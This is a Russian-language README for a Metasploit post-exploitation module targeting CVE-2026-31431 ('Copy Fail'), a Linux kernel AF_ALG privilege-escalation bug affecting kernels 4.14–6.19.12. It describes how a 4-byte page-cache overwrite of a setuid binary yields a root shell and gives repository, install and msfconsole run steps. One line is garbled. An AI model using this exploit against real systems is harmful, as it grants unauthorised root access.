
Автоматизированный модуль пост-эксплуатации Metasploit для CVE-2026-31431 ("Copy Fail"). Использует детерминированную логическую ошибку в подсистеме AF_ALG ядра Linux для достижения локального повышения привилегий (LPE) до root путем безопасного повреждения setuid-бинарника непосредственно в общем кэше страниц (RAM) без изменения файлов на диске.
Автоматизированный модуль Metasploit для пост-эксплуатации, использующий CVE-2026-31431 (известный как "Copy Fail") для выполнения локального повышения привилегий (LPE) на уязвимых ядрах Linux (версии 4.14 – 6.19.12).
Модуль эксплуатирует логическую ошибку в подсистеме криптографии ядра Linux (модуль algif_aead интерфейса AF_ALG). Из-за некорректной оптимизации размещения в памяти непривилегированный локальный пользователь может с помощью системного вызова splice() отобразить доступный только для чтения системный бинарный файл (например, /usr/bin/su или /usr/bin/sudo) в сокет AF_ALG и выполнить контролируемую перезапись 4 байт непосредственно в системном Page Cache (RAM).
Повреждая определённые инструкции проверки привилегий setuid-бинарного файла в памяти, модуль обходит механизмы контроля доступа и запускает root-оболочку, не изменяя физический файл на диске.
shell, так и с meterpreterregister_file_for_cleanup4.14 до 6.19.12git clone https://github.com/adityasingh108/CVE-2026-31431-Metasploit-exploit
cd CVE-2026-31431-Metasploit-exploit
Пользовательские модули Metasploit следует размещать в локальном пути модулей пользователя:
~/.msf4/modules/
Создайте необходимую структуру каталогов, если она ещё не существует:
~/.msf4/modules/
└── post/
└── linux/
└── escalation/
Скопируйте файл copy_fail.rb в следующий каталог:
~/.msf4/modules/post/linux/escalation/
Итоговая структура:
~/.msf4/modules/
└── post/
└── linux/
└── escalation/
└── copy_fail.rb
Запустите консоль Metasploit:
msfconsole
Перезагрузите все модули:
reload_all
Загрузите модуль эксплойта:
use post/linux/escalation/copy_fail
show options
set SESSION 1
run
или
exploit
msfconsole
use post/linux/escalation/copy_fail
show options
set SESSION 1
run
Модуль нацелен на уязвимые ядра Linux:
4.14 <= Версия ядра <= 6.19.12
Этот проект предоставлен только для образовательных целей и проведения авторизованных исследований в области безопасности. Несанкционированное использование в отношении систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, может нарушать действующие законы и нормативные акты.
Используйте ответственно.